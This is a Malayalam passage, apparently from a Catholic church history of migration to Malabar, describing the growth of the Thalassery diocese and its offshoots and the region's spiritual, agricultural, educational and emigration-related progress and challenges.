രൂപത വിഭജിച്ച് രൂപംകൊടുത്തതാണ് ഭദ്രാവതി (2007), മാണ്ഡ്യാ (2010) രൂപതകള്‍. 2010-ല്‍ തമിഴ്നാട്ടിലെ രാമനാഥപുരം രൂപത പാലക്കാട് രൂപത വിഭജിച്ചുണ്ടായതാണ്. തലശ്ശേരി രൂപതയുടെയും സീറോമലബാര്‍ സഭയുടെയും ഭൗതികമായ ഈ വളര്‍ച്ച വിശ്വാസസമൂഹത്തിന്‍റെ കെട്ടുറപ്പിന്‍റെയും സമൂഹം കൈവരിക്കുന്ന പുരോഗതിയുടെയും പ്രകടമായ ലക്ഷണമായിരുന്നു. അറുപതാണ്ടുകളുടെ വിശ്വാസജീവിതം മലബാറിന് നല്കിയ ആത്മീയവും ഭൗതികവുമായ പുരോഗതിയുടെ തോത് നിര്‍ണ്ണയാതീതമാണ്. എങ്കിലും മലബാര്‍കുടിയേറ്റമേഖല ഇന്ന് തലശ്ശേരി അതിരൂപതയുടെ കീഴില്‍ മാനന്തവാടി, താമരശ്ശേരി, ബല്‍ത്തങ്ങാടി, ഭദ്രാവതി, മാണ്ഡ്യ രൂപതകളായി തിരിഞ്ഞ് നടത്തുന്ന ആത്മീയവും സാമൂഹികവുമായ ശുശ്രൂഷാമേഖലകള്‍ നിരവധിയാണ്.

2.1 പ്രത്യേകമേഖലകളിലെ പുരോഗതി

പന്ത്രണ്ട് വൈദികരും എഴുപത്തയ്യായിരത്തോളം കുടിയേറ്റക്കാരുമായി ആരംഭിച്ച പുരോഗതിയിലേക്കുള്ള തലശ്ശേരി രൂപതയുടെ മുന്നേറ്റം ഇന്ന് ആറോളം രൂപതകളിലായി നിരവധി വൈദികരും ആയിരക്കണക്കിന് സന്ന്യസ്തരും അനേകം പ്രസ്ഥാനങ്ങളും വമ്പിച്ച ഒരു ജനസമൂഹവും ഉള്‍പ്പെടുന്ന മഹാപ്രസ്ഥാനമായി വളര്‍ന്നിരിക്കുകയാണ്. കുടിയേറ്റക്കാരുടെ എണ്ണത്തിലുള്ള വര്‍ദ്ധനവ് പിന്നീട് ശ്രദ്ധേയമായ സാമൂഹികമാറ്റങ്ങള്‍ക്ക് കാരണമാവുകയും അവ ദേശത്തിന്‍റെ തന്നെ പുരോഗതിയ്ക്ക് നിമിത്തമാവുകയുമാണുണ്ടായത്. പ്രഥമഘട്ടത്തില്‍ വിദ്യാഭ്യാസസ്ഥാപനങ്ങളും റോഡുകളും അടിസ്ഥാനസൗകര്യങ്ങളും രൂപംകൊണ്ടു. ക്രമേണ പ്രൈമറി, അപ്പര്‍ പ്രൈമറി, സെക്കന്‍ഡറി സ്കൂളുകള്‍ക്കു പുറമേ അദ്ധ്യാപകപരിശീലനകേന്ദ്രങ്ങളും കോളേജുകളും ഉയര്‍ന്നു; മറ്റ് സാമൂഹിക-സാംസ്കാരിക സ്ഥാപനങ്ങളും പ്രസ്ഥാനങ്ങളും ഉടലെടുത്തു. വിവിധമേഖലകളില്‍ മലബാര്‍ കുടിയേറ്റമേഖല കൈവരിച്ച അഭൂതപൂര്‍വ്വകമായ പുരോഗതിയിലേക്ക് ഒന്നു കണ്ണോടിക്കാം.

2.1.1 ആത്മീയമേഖലയിലുള്ള വളര്‍ച്ചയും മതമൈത്രിയും:

മലബാര്‍കുടിയേറ്റമേഖലയുടെ ആത്മീയമായ വളര്‍ച്ച വളരെ സ്പഷ്ടമാണ്. കുടിയേറ്റ കര്‍ഷകരുടെ ആദ്യകാലശ്രമങ്ങളില്‍ ഏറ്റവും പ്രധാനപ്പെട്ടത് തങ്ങളെത്തിപ്പെട്ടെ ദേശങ്ങളില്‍ ഒരു ദേവാലയവും വൈദികന്‍റെ സേവനവും ലഭ്യമാക്കുക എന്നതായിരുന്നു. “തീക്ഷ്ണമായ മതജീവിതം നയിച്ചിരുന്ന അവര്‍ പുതിയ സ്ഥലങ്ങളില്‍ ആരാധനാലയങ്ങള്‍ സ്ഥാപിച്ചു”.  പള്ളിയുടെ നേതൃത്വത്തിലായിരുന്നു പിന്നീടുള്ള പ്രവര്‍ത്തനങ്ങളെല്ലാം. വൈദികരുടെ നേതൃത്വം ലഭ്യമായതോടെ പലര്‍ക്കും മലബാറിലേക്ക് കുടിയേറുന്നതിനുള്ള ആത്മവിശ്വാസം വര്‍ദ്ധിച്ചു. മലബാര്‍ കുടിയേറ്റമേഖല മുഴുവനും വിവിധ രൂപതകളായി വിഭജിക്കപ്പെട്ടതോടെ ജനങ്ങളുടെ ആത്മീയാവശ്യങ്ങള്‍ നിറവേറ്റുന്നതിന് സഭാനേതൃത്വത്തിന് എളുപ്പത്തില്‍ സാധിച്ചു. ഇന്ന് മലബാറിലെ പ്രൗഡഗംഭീരങ്ങളായ ദേവാലയങ്ങളും സാമൂഹ്യപ്രവര്‍ത്തനസംഘടനകളും സ്ഥാപനങ്ങളും ശക്തമായ ക്രൈസ്തവസാന്നിദ്ധ്യം വിളിച്ചോതുന്നവയാണ്.

ഇതരമതങ്ങളോടുള്ള സഹിഷ്ണുതയും സഹവര്‍ത്തിത്വവും കുടിയേറ്റമേഖലയുടെ ഒരു പ്രത്യേകതയാണ്. ജീവിതത്തിന്‍റെ പരുക്കന്‍ യാഥാര്‍ത്ഥ്യങ്ങളനുഭവിച്ച് രൂപം കൊണ്ട ഒരു ജനതയ്ക്ക് തങ്ങളുടെ ആചാരങ്ങളെയും വിശ്വാസത്തെയും ചൊല്ലി സംഘര്‍ഷങ്ങളുണ്ടാക്കേണ്ട കാര്യമുണ്ടായിരുന്നില്ല. ജീവിതാവശ്യങ്ങളില്‍ അവര്‍ ഒറ്റക്കെട്ടായി നിന്നു. കുടിയിറക്കു കാലഘട്ടങ്ങളിലെ ഒത്തൊരുമിച്ചുള്ള പ്രവര്‍ത്തനങ്ങള്‍ ഇതിന് ഉത്തമോദാഹരണങ്ങളാണ്. ജാതിയുടെയും മതത്തിന്‍റെയും പേരിലുള്ള കലാപങ്ങള്‍ മലബാറില്‍ ഇല്ലെങ്കിലും സ്ഥാപിതതാത്പര്യങ്ങളോടെ നടത്തപ്പെടുന്ന ഒറ്റപ്പെട്ട അക്രമങ്ങള്‍ ഇതിന് അപവാദമായുണ്ട്.

2.1.2 കാര്‍ഷികമേഖലയിലുള്ള വളര്‍ച്ചയും സമ്പദ്ഘടനയും:

കാര്‍ഷികമേഖലയിലുള്ള അഭൂതപൂര്‍വ്വകമായ വളര്‍ച്ചയാണ് മലബാര്‍ കുടിയേറ്റത്തിന്‍റെ ദൃശ്യമായ ദൈവാനുഗ്രഹങ്ങളിലൊന്ന്. കൈവച്ച മേഖലകളിലെല്ലാം പൊന്നുവിളയിക്കാന്‍ മലബാറിലെ കര്‍ഷകന് സാധിച്ചു. റബ്ബര്‍, ഇഞ്ചി, കാപ്പി, കുരുമുളക്, ചായ തുടങ്ങി എല്ലാ കാര്‍ഷികവിളകളും മലബാറില്‍ സുലഭമായി കൃഷിചെയ്യാനും കയറ്റി അയയ്ക്കാനുമാരംഭിച്ചതോടെ മലബാറിലെ സാമ്പത്തികസ്ഥിതിയില്‍ കാര്യമായ മാറ്റങ്ങള്‍ വന്നു. കാര്‍ഷികമേഖലയില്‍ കാലാനുസൃതമായ പുരോഗമനങ്ങളുണ്ടാവുകയും കൃഷിയുടെ രീതികളിലും ഇനങ്ങളിലും വ്യത്യാസങ്ങളുണ്ടാവുകയും അപ്രതീക്ഷിത പ്രതിസന്ധികള്‍ രൂപപ്പെടുകയും ചെയ്ത കാലഘട്ടങ്ങളും കുറവായിരുന്നില്ല. ജാഗരൂകരായിരുന്ന സഭാവിശ്വാസികള്‍ ഉണര്‍ന്നുപ്രവര്‍ത്തിച്ച അത്തരം സന്ദര്‍ഭങ്ങള്‍ ചരിത്രത്തില്‍ ധാരാളമുണ്. അതിലൊന്നാണ് നാണ്യവിളകളുടെ വിലത്തകര്‍ച്ചമൂലം ദുരിതത്തിലായവര്‍ക്ക് പ്രതീക്ഷ നല്കിക്കൊണ്ടു കടന്നുവന്ന ഇന്‍ഫാം എന്ന സംഘടന. ഇന്‍ഫാമിന്‍റെ ആഭിമുഖ്യത്തില്‍ ജനുവരി 15 കര്‍ഷകദിനമായി ആചരിക്കുകയും ഈ മേഖലയിലെ പ്രതിസന്ധികള്‍ പരിഹരിക്കാനുള്ള സമഗ്രപദ്ധതികള്‍ ആസൂത്രണം ചെയ്യുകയും ചെയ്യുന്നു. കുടിയിറക്കിനെതിരെയും വന്യമൃഗങ്ങളുടെ ശല്യത്തിനെതിരെയുമെല്ലാം ഇന്‍ഫാം സംഘടിതമായി നീങ്ങുകയും കര്‍ഷകരുടെ അവകാശങ്ങള്‍ക്കായി പൊരുതുകയും ചെയ്യുന്നു. വിവിധ രൂപതകളിലുള്ള സാമൂഹികസേവനസംഘടനകളും ഇക്കാര്യങ്ങളില്‍ നേതൃത്വം നല്കുന്നുണ്ട്. കേന്ദ്രപദ്ധതികള്‍ ഉപയോഗപ്രദമായി നടപ്പിലാക്കുന്നതിനുള്ള നേതൃത്വം, കേന്ദ്ര-സംസ്ഥാനനേതൃത്വവുമായുള്ള ചര്‍ച്ചകള്‍, നാളികേരവികസനബോര്‍ഡുമൊന്നിച്ചുള്ള പദ്ധതികള്‍, നബാര്‍ഡിന്‍റെ നീര്‍ത്തടവികസനപദ്ധതിയും ഇതരപദ്ധതികളും നടപ്പിലാക്കുക, കാര്‍ഷികോത്സവങ്ങള്‍ സെമിനാറുകള്‍ എന്നിവ സംഘടിപ്പിക്കുക, ദുരിതത്തിലാഴ്ന്ന കര്‍ഷകരെ ഏതുവിധേനയും സഹായിക്കുക എന്നിങ്ങനെ മലബാറിലെ വിവിധ രൂപതകള്‍ കേന്ദ്രീകരിച്ചു നടക്കുന്ന പ്രവര്‍ത്തനങ്ങള്‍ നിരവധിയാണ്. രാജ്യത്തിന്‍റെ സമ്പദ്വ്യവസ്ഥ ഏറെ പ്രതികൂലമായിക്കൊണ്ടിരിക്കുന്ന സാഹചര്യത്തില്‍ ഭക്ഷ്യസുരക്ഷയും ജീവിതസുരക്ഷയും ഉറപ്പാക്കുകയാണ് ഇവയുടെയെല്ലാം ലക്ഷ്യം.

2.1.3 വിദ്യാഭ്യാസ-സാംസ്കാരികമേഖലകളിലുള്ള വളര്‍ച്ച:

തലശ്ശേരി, മാനന്തവാടി, താമരശ്ശേരി രൂപതകളുടെ കോര്‍പ്പറേറ്റ് എഡ്യുക്കേഷണല്‍ ഏജന്‍സികള്‍ക്കു കീഴിലായി മലബാര്‍ കുടിയേറ്റമേഖലയില്‍ ആയിരത്തിനടുത്ത് വിദ്യാഭ്യാസസ്ഥാപനങ്ങളുണ്ട്. മലബാറിന്‍റെ പുരോഗതികള്‍ക്കെല്ലാം കാരണമായ വിദ്യാഭ്യാസമേഖലയുടെ വളര്‍ച്ച ഒരര്‍ത്ഥത്തില്‍ കത്തോലിക്കാസഭയുടെ പ്രവര്‍ത്തനഫലമാണ്. പഞ്ഞംകിടന്നു മിച്ചംവച്ച തുട്ടുകാശുകള്‍കൊണ്ടാണ് മലബാറിലെ കര്‍ഷകര്‍ തങ്ങളുടെ വരുംതലമുറകള്‍ക്കായി വിദ്യാഭ്യാസസ്ഥാപനങ്ങള്‍ക്ക് അടിസ്ഥാനമിട്ടത്. ലോവര്‍ പ്രൈമറി സ്കൂളുകളും അപ്പര്‍ പ്രൈമറി സ്കൂളുകളും ഹൈസ്കൂളുകളുമായി തുടങ്ങിയ വളര്‍ച്ച ക്രമേണ കോളേജുകളും അദ്ധ്യാപകര്‍ക്കുള്ള പരിശീലനകേന്ദ്രങ്ങളുമെല്ലാമായിത്തീര്‍ന്നു. ഇന്ന് രാജ്യത്തെ തന്നെ നിലവാരമുള്ള വിദ്യാഭ്യാസസ്ഥാപനങ്ങളും സര്‍വ്വകലാശാലകളും മലബാറിലുണ്ട്. പ്രൊട്ടസ്റ്റന്‍റുമിഷനറിമാര്‍ തുടങ്ങിവച്ച വിദേശവിദ്യാഭ്യാസത്തിന്‍റെ ശൈലിയും നിലനില്ക്കുന്നുണ്ട്. കാലാനുസൃതമായി രൂപപ്പെട്ട എന്‍ട്രന്‍സ് കോച്ചിംഗ് സെന്‍ററുകളും സിവില്‍സര്‍വ്വീസ് പരീശീലനവേദികളുമെല്ലാം ഇന്ന് സുലഭമാണ്. കത്തോലിക്കാസഭയുടെ മേല്‍നോട്ടത്തിലും അല്ലാതെയും നടക്കുന്ന വിദ്യാഭ്യാസ പരിശീലനപദ്ധതികള്‍ പക്ഷേ വെല്ലുവിളികളില്‍ നിന്ന് തികച്ചും മുക്തമല്ലതാനും.

കലാസാംസ്കാരികരംഗത്ത് മലബാറിലെ ക്രൈസ്തവരുടെ സംഭാവനകള്‍ സ്തുത്യര്‍ഹവും നിസ്തുലവുമാണ്. കേരളത്തിന്‍റെ തന്നെ സാംസ്കാരികവളര്‍ച്ചയ്ക്ക് അടിത്തറപാകിയ നസ്രാണിക്രിസ്ത്യാനികള്‍ കുടിയേറിയഭൂമിയിലും തങ്ങളുടെ പാരമ്പര്യങ്ങളെ കൈവിടാന്‍ തയ്യാറായിരുന്നില്ല. ചിത്രകലയും സാഹിത്യവും നാടകവും സിനിമയുമെല്ലാം മലബാറിന്‍റെ ഹരിതഭൂമിയിലും ജډമെടുത്തു. സഭാസ്ഥാപനങ്ങളുടെ മേല്‍നോട്ടത്തിലും സംഘടനകളുടെ സാരഥ്യത്തിലുമെല്ലാം സംഘടിതമായ ശ്രമങ്ങള്‍ ഈ മേഖലയില്‍ നടക്കുന്നുണ്ട്. സി.എം.എല്‍, കെ.സി.വൈ.എം., തിരുബാലസഖ്യം തുടങ്ങിയ സംഘടനകളുടെ കലാ-സാഹിത്യ മത്സരങ്ങള്‍ ഏറെ പ്രോത്സാഹജനകവും ആവേശഭരിതവുമാണ്. മാനന്തവാടി രൂപതയില്‍ തുടക്കം കുറിച്ച ആദ്യത്തെ കമ്മ്യൂണിറ്റി റേഡിയോയായ റേഡിയോ മാറ്റൊലി സാംസ്കാരികകേരളത്തിന് മലബാറിന്‍റെ തനതായ സംഭാവനയാണ്. മലബാറിന്‍റെ പ്രത്യേകിച്ച് വയനാടിന്‍റെ തനതുസംസ്കാരത്തെ പരിപോഷിപ്പിക്കുന്നതിനും ജനങ്ങള്‍ക്ക് ഉപകാരപ്രദമാകുന്ന പരിപാടികള്‍ സംപ്രേക്ഷണം ചെയ്യുന്നതിനും മുന്‍തൂക്കം കൊടുക്കുന്ന ഈ പ്രസ്ഥാനം അനേകര്‍ക്കു പ്രചോദനമാകുന്നുണ്ട്.

2.1.4 വിദേശപ്രയാണങ്ങളും സാമ്പത്തികവളര്‍ച്ചയും:

മലബാറിലേക്കുള്ള കുടിയേറ്റത്തിന്‍റെ വിവിധഘട്ടങ്ങള്‍ മുന്‍പേജുകളില്‍ കണ്ടിരുന്നു. മലബാറില്‍ നിന്ന് ഇന്ത്യയുടെ വിവിധഭാഗങ്ങളിലേക്കും വിദേശങ്ങളിലേക്കുമുള്ള കുടിയേറ്റമാണ് ഈ മേഖലയില്‍ ഏറ്റവും പുതിയ പ്രതിഭാസം. രണ്ടു പതിറ്റാണ്ടുകള്‍ക്കത്തുമാത്രമാണ് ഇതിന്‍റെ സാധ്യതകളും സാഹചര്യങ്ങളും ഇവിടെ രൂപംകൊണ്ടത്. കാര്‍ഷികമേഖലയിലുള്ള അതൃപ്തിയും മാറുന്ന ജീവിതശൈലികളോടുള്ള ആഭിമുഖ്യങ്ങളുമായിരിക്കാം ഒരുപക്ഷേ വേറിട്ട ഇത്തരം ചിന്തകള്‍ക്കു പുതുതലമുറകലെ പ്രേരിപ്പിക്കുന്നത്. പ്രാരംഭഘട്ടങ്ങളില്‍ ബാംഗ്ലൂര്‍, ഹൈദരാബാദ്, ബോംബെ പോലുള്ള മെട്രോകളിലേക്കും പിന്നീട് വടക്കേഇന്ത്യയിലേക്കും പഠനത്തിനും തൊഴിലിനുമായി പോയവര്‍ സാവധാനം ഗള്‍ഫ് രാജ്യങ്ങളിലേക്കും മറ്റ് പാശ്ചാത്യനാടുകളിലേക്കുമായി കുടിയേറ്റം വ്യാപിപ്പിച്ചു. കൂടിയ ശമ്പളവും ആയാസം കുറഞ്ഞ ജോലിയും മറ്റുള്ളവരെയും ആകര്‍ഷിച്ചുതുടങ്ങി. ജീവിതം പച്ചപിടിക്കാന്‍ അക്കരക്ക് യാത്ര ചെയ്യണമെന്ന ചിന്ത ഒരു ഒഴിയാബാധപോലെ പുതുതലമുറയെ പിന്തുടര്‍ന്നു. മറുനാടുകളിലേക്ക് കുടിയേറിയവര്‍ കൂടുതല്‍ ഉയര്‍ന്ന സാമ്പത്തികനിലവാരത്തിലേക്ക് എത്തിയെന്നത് തികച്ചും സത്യമാണ്. വലിയ വീടുകളും വാഹനങ്ങളും ജീവിതസൗകര്യങ്ങളും അവര്‍ക്കു സ്വന്തമായി. വിദേശികളില്ലാത്ത ഒരു ഗ്രാമംപോലും ഇല്ലായെന്ന നിലയില്‍ നിന്ന് വിദേശികളില്ലാത്ത കുടുംബമില്ല എന്ന നിലയിലേക്കെത്തിയിരിക്കുന്നു വിപ്രവാസത്തിന്‍റെ വര്‍ത്തമാനകാലം.

3. വെല്ലുവിളികളും സ്വപ്നങ്ങളും

മലബാര്‍ കുടിയേറ്റത്തിന്‍റെ ആവേശമുണര്‍ത്തുന്ന ചരിത്രവും അതിവേഗതയിലുള്ള പുരോഗതിയും വര്‍ത്തമാനകാലത്തില്‍ നിരവധി വെല്ലുവിളികളെ അഭിമുഖീകരിക്കുന്നുണ്ട്. കുടിയേറ്റത്തിന്‍റെ ആരംഭകാലഘട്ടത്തിലെന്നതുപോലെ ജീവനും സ്വത്തിനും ഒരുപോലെ ഭീഷണിയുയര്‍ത്തുന്നവയാണ് അവ. എങ്കിലും അവയെ വിശകലനം ചെയ്യാനും പ്രതിവിധികള്‍ നിര്‍ദ്ദേശിക്കാനും സഭാധികാരികളും രാഷ്ട്രീയനേതൃത്വവും എന്നും ജാഗരൂകരാണ്. കുടിയേറ്റമേഖല നേരിടുന്ന പ്രധാനവെല്ലുവിളികളും അവയെ അതിജീവിക്കാന്‍ അവരെ പ്രേരിപ്പിക്കുന്ന ഭാവിപ്രതീക്ഷകളും വിശകലനം ചെയ്യാം.

3.1 ആത്മീയമേഖലയിലെ വെല്ലുവിളികളും പ്രത്യാശയും

3.1.1. വിശ്വാസമേഖലയിലെ വ്യതിചലനങ്ങളാണ്  ആത്മീയമേഖല നേരിടുന്ന പ്രധാനവെല്ലുവിളി. സെക്ടുകളും പെന്തക്കോസ്തുവിഭാഗങ്ങളും കേരളസഭയില്‍ ഇന്ന് വളരെയധികമായി വര്‍ദ്ധിച്ചിരിക്കുന്നു. അവയുടെയെല്ലാംതന്നെ ഏറെ വളക്കൂറുള്ള മണ്ണാണ് മലബാര്‍. മലബാറിലെ പ്രായേണ അടിസ്ഥാനവിദ്യാഭ്യാസം മാത്രമുള്ള ജനസാമാന്യത്തെ ആകര്‍ഷിക്കാനും വിശ്വാസവിരുദ്ധപ്രസ്ഥാനങ്ങളിലേക്ക് കൊണ്ടുപോകാനും അവര്‍ക്ക് എളുപ്പത്തില്‍ സാധിക്കുന്നു. എംപറര്‍ എമ്മാനുവല്‍ ട്രസ്റ്റ്, ആത്മവിമോചനമദ്ധ്യസ്ഥാലയം, സ്പിരിറ്റ് ഇന്‍ ജീസസ്സ്, ആത്മാഭിഷേകസഭ, കവനന്‍റ് പീപ്പിള്‍, സ്വര്‍ഗ്ഗീയവിരുന്ന്, യഹോവസാക്ഷികള്‍ എന്നിവയും ഇതര പെന്തക്കോസ്ത് പ്രസ്ഥാനങ്ങളും നവയുഗപ്രസ്ഥാനങ്ങളുമാണ് ഈ രംഗത്ത് സത്യവിശ്വാസത്തിനും വിശ്വാസികളുടെ ആത്മീയജീവിതത്തിലും വിള്ളലുകള്‍ സൃഷ്ടിക്കുന്നത്. സമഗ്രമായ വചനവ്യാഖ്യാനവും ഇടവകകേന്ദ്രീകൃതമായ വിശ്വാസജീവിതവുമാണ്  ഈ പ്രശ്നങ്ങള്‍ക്കുള്ള പ്രധാന പ്രതിവിധികള്‍.

3.1.2. കുട്ടികള്‍ക്കിടയില്‍ വര്‍ദ്ധിച്ചുവരുന്ന വിശ്വാസപരിശീലനത്തിലുള്ള താത്പര്യക്കുറവ് ഗൗരവതരമാണ്. മാധ്യമങ്ങളുടെ വര്‍ദ്ധിച്ച ഉപയോഗവും സാംസ്കാരികസങ്കലനം മൂലം ചിന്തയിലും ജീവിതശൈലിയിലും വരുന്ന മാറ്റങ്ങളും ഇതിന് കാരണങ്ങളാണ്. കുടുംബങ്ങളില്‍ വിശ്വാസചൈതന്യം കുറയുന്നതിന് ഇതിടയാക്കുന്നു. കാലാനുസൃതമായ വിശ്വാസപരിശീലനത്തിന് രൂപതാകേന്ദ്രങ്ങള്‍ ശ്രദ്ധചെലുത്തുന്നുണ്ട് എങ്കിലും ഇടവകതലങ്ങളില്‍ പലതും പ്രായോഗികമാകുന്നില്ല എന്നതാണ് സത്യം. പ്രശ്നത്തിന്‍റെ അതിഗൗരവസ്വഭാവം തിരിച്ചറിയുകയും കാര്യക്ഷമമായ ഇടപെടലുകളും നടത്തുകയും ചെയ്യേണ്ടത് അത്യാവശ്യമാണ്.

3.1.3. പ്രവാസികളായ വിശ്വാസികളുടെ അജപാലനം  ഇന്ന് ഏറെ ചര്‍ച്ച ചെയ്യപ്പെടുന്നുണ്ട്. തൊഴിലിനും മെച്ചപ്പെട്ട ജീവിതസാഹചര്യങ്ങള്‍ക്കുമായി ഗള്‍ഫ്രാജ്യങ്ങളിലേക്കും മറ്റ് പാശ്ചാത്യരാജ്യങ്ങളിലേക്കും മലബാറില്‍ നിന്നും കുടിയേറിയിരിക്കുന്നവരുടെ എണ്ണം നിസ്സാരമല്ല. നേഴ്സിംഗ് തൊഴിലാളികളുടെ എണ്ണംതന്നെ വളരെയധികമാണ്. സുറിയാനിസഭാവിശ്വാസികളായ ഇവരുടെയെല്ലാം സമഗ്രമായ ആത്മീയജീവിതം സുഭദ്രമാക്കല്‍ പരിമിതമായ ഭരണാധികാരപ്രദേശമുള്ള സീറോമലബാര്‍സഭയെ സംബന്ധിച്ചടത്തോളം വെല്ലുവിളിയാണ്. എങ്കിലും ഈ ഉദ്ദേശം വച്ചുകൊണ്ട് നടത്തുന്ന പ്രവര്‍ത്തനങ്ങള്‍ ഇന്ന് ഏറെ പുരോഗമിച്ചിട്ടുണ്ട്. പ്രവാസികളുടെ കണക്കെടുപ്പും അവരെ കണ്ടെത്തലും അവരുടെ കൂട്ടായ്മരൂപീകരിക്കലുമെല്ലാം ദ്രുതഗതിയില്‍ നടന്നുകൊണ്ടിരിക്കുന്നു. പ്രവാസജീവിതം കേരളത്തില്‍ ഇടവകവികാരിമാരുമായി ബന്ധപ്പെട്ട് നടത്തുന്നതില്‍ ശ്രദ്ധചെലുത്തിയാല്‍ ഈ പ്രവര്‍ത്തനങ്ങള്‍ വരുംകാലങ്ങളില്‍ കൂടുതല്‍ കാര്യക്ഷമമാകും.

3.2 കാര്‍ഷികപ്രതിസന്ധികളും പ്രതിവിധികളും

3.2.1. കൃഷിയോടുള്ള താത്പര്യവും ആഭിമുഖ്യവും കര്‍ഷകര്‍ക്കുതന്നെ നഷ്ടപ്പെടുന്നു.  കൃഷിക്കാരുടെ മക്കള്‍തന്നെ മറ്റുമേഖലകളിലേക്ക് പിന്തിരിയുകയും തത്ഫലമായി കൃഷിഭൂമികള്‍ ഉപയോഗശൂന്യമാവുകയും ചെയ്യുന്നു. കൃഷിയോടുള്ള താത്പര്യക്കുറവും മറ്റ് ജോലികളുടെ ആകര്‍ഷണീയതയും ഇതിനുള്ള കാരണങ്ങളാണ്. നേഴ്സിംഗ് പോലുള്ള തൊഴിലധിഷ്ഠിതപഠനങ്ങള്‍ക്കുവേണ്ടി പണം മുടക്കുന്നവരാണ് ഇന്ന് ഏറെയുമുള്ളത്.

3.2.2. വിളകളെ ബാധിക്കുന്ന പുതിയയിനം രോഗങ്ങളാണ് ഒരു പ്രശ്നം. രാസവസ്തുക്കളുടെയും കീടനാശിനികളുടെയും ഉപയോഗവും അവ പ്രകൃതിയില്‍ അസന്തുലിതാവസ്ഥയും ഇതിനോടനുബന്ധിച്ച് മനസ്സിലാക്കണം. കൂടുതലായ സാമ്പത്തികനേട്ടത്തിനും രോഗങ്ങളില്‍ നിന്ന് വിളകളെ രക്ഷിക്കുന്നതിനുമായി അതിഗാഢമായ കീടനാശിനികള്‍ ഉപയോഗിക്കുന്നത് ജീവനുവരെ ഭീഷണിയായിത്തീര്‍ന്നിരിക്കുകയാണ്. രോഗങ്ങളെ പ്രതിരോധിക്കാന്‍ കഴിയുന്നില്ലായെന്നത് മറ്റൊരു വശം. എന്‍ഡോസള്‍ഫാന്‍ സംസ്ഥാനത്ത് പല സ്ഥലങ്ങളിലും പ്രത്യേകിച്ച് മലബാറില്‍ വരുത്തിവച്ച വിനകള്‍ ഭോപ്പാല്‍ദുരന്തത്തോട് ഉപമിക്കപ്പെടുന്നുണ്ട്.

3.2.3. കാലാവസ്ഥാവ്യതിയാനങ്ങളും പ്രകൃതിക്ഷോഭങ്ങളും  കാര്‍ഷികമേഖല നേരിടുന്ന മറ്റൊരു പ്രതിസന്ധിയാണ്. മുന്‍കാലങ്ങളിലെന്നതുപോലെ കാലാവസ്ഥ മുന്‍കൂട്ടി പ്രവചിക്കാനാവാത്ത സ്ഥിതിയായിരിക്കുന്നു. കാലാവസ്ഥയെ ആശ്രയിച്ച് ചെയ്യുന്ന കൃഷിയിനങ്ങളെല്ലാം തന്നെ പരാജയത്തിന്‍റെ വക്കിലാണ്. കഠിനമായ ചൂടും വര്‍ദ്ധിച്ചുവരുന്ന ജലദൗര്‍ലഭ്യവും കണക്കിലെടുക്കേണ്ടതുണ്ട്. മലബാറിന്‍റെ സ്വാഭാവികകാലാവസ്ഥയ്ക്കു വന്ന ദ്രുതഗതിയിലുള്ള മാറ്റത്തോട് പ്രതികരിക്കാന്‍ പലപ്പോഴും ചെറുകിട കര്‍ഷകര്‍ക്ക് കഴിയുന്നില്ല.

3.2.4. താങ്ങാനാവാത്ത കൂലിച്ചിലവും കാട്ടുമൃഗങ്ങളുടെ ശല്യവും  കാര്‍ഷികമേഖലയിലുള്ള സകലപ്രതീക്ഷകളും തകര്‍ക്കുന്നവിധത്തില്‍ വര്‍ദ്ധിച്ചുകൊണ്ടിരിക്കുന്നു. മാസംതോറും ദിവസക്കൂലി വര്‍ദ്ധിക്കുന്നുണ്ടെങ്കിലും കാര്‍ഷികഉത്പന്നങ്ങളുടെ വിലയില്‍ കാര്യമായ മാറ്റങ്ങള്‍ വരുന്നില്ല എന്നത് അപകടകരമായ പ്രതിഭാസമാണ്. വനങ്ങളിലെ ജല-ഭക്ഷണദൗര്‍ലഭ്യം മൂലം കാട്ടുമൃഗങ്ങള്‍ നാട്ടിലേക്കിറങ്ങുന്നതും വര്‍ദ്ധിച്ചിരിക്കുന്നു.

3.2.5. മലബാറിലെ കാര്‍ഷികമേഖല നേരിടുന്ന ഗുരുതരമായ മറ്റൊരു പ്രശ്നം കര്‍ഷകആത്മഹത്യയാണ്.  ഇടവേളകളെടുത്ത് അത് വര്‍ദ്ധിച്ചുകൊണ്ടിരിക്കുന്നു. കൃഷിക്കുവേണ്ടിയും മറ്റ് ജീവിതാവശ്യങ്ങള്‍ക്കുവേണ്ടിയും ബാങ്കുകളെ ആശ്രയിച്ച് കടമെടുക്കുന്ന കര്‍ഷകര്‍ക്ക് സമയബന്ധിതമായി അവ തിരിച്ചടക്കാന്‍ കഴിയാത്തവിധം കാര്‍ഷികമേഖല പലകാരണങ്ങള്‍കൊണ്ട് തകരാറിലാകുമ്പോഴാണ് അറ്റകൈയെന്നവണ്ണം അവര്‍ ആത്മഹത്യ ചെയ്യുന്നത്.

പരസ്പരപ്രോത്സാഹനവും പിന്‍ബലവും നല്കുന്ന കൂട്ടായ പ്രവര്‍ത്തനങ്ങളാണ് ഇന്ന് കാര്‍ഷികമേഖലയില്‍ ആവശ്യമായിരിക്കുന്നത്. സംഘടിതസമ്മര്‍ദ്ദങ്ങളും ബോധവത്കരണപരിപാടികളും ശാസ്ത്രീയകൃഷിരീതികളെ സംബന്ധിക്കുന്ന ക്ലാസുകളും ചര്‍ച്ചകളും സംഘടിപ്പിക്കുകയും യുവതലമുറയില്‍ കൃഷിയോടുള്ള താത്പര്യം ജനിപ്പിക്കുകയും ചെയ്യണം. സാമ്പത്തികനേട്ടത്തേക്കാളും ലാഭത്തേക്കാളും മുന്‍ഗണന ഭക്ഷണവസ്തുക്കളുടെ ഉത്പാദനത്തിന് നല്കാന്‍ കര്‍ഷകര്‍ക്കു കഴിയണം. സാമ്പത്തികലാഭത്തേക്കാള്‍ ഭക്ഷ്യസുരക്ഷ എന്നതായിരിക്കണം അവരുടെ മുദ്രാവാക്യം. ഒപ്പം, പ്രകൃതിനാശം കുറയ്ക്കാനും മണ്ണിന്‍റെ ജൈവശക്തി നിലനിര്‍ത്താനും സഹായിക്കുന്ന സൗരോര്‍ജ്ജത്തിന്‍റെ ഉപയോഗം, ബയോഗ്യാസ് ഉല്പാദനം, മാലിന്യസംസ്കരണം, നദികളുടെയും നീര്‍ത്തടങ്ങളുടെയും സംരംക്ഷണം, മഴവെള്ളസംഭരണം മുതലായവ വ്യാപിപ്പിക്കാനും ശ്രമിക്കണം. പുതിയ കൃഷിരീതിയായ ഓര്‍ഗാനിക് ഫാമിംഗ് ജലസേചനരീതിയായ ഡ്രിപ് ഇറിഗേഷന്‍ എന്നിവ വ്യാപകമാക്കാന്‍ 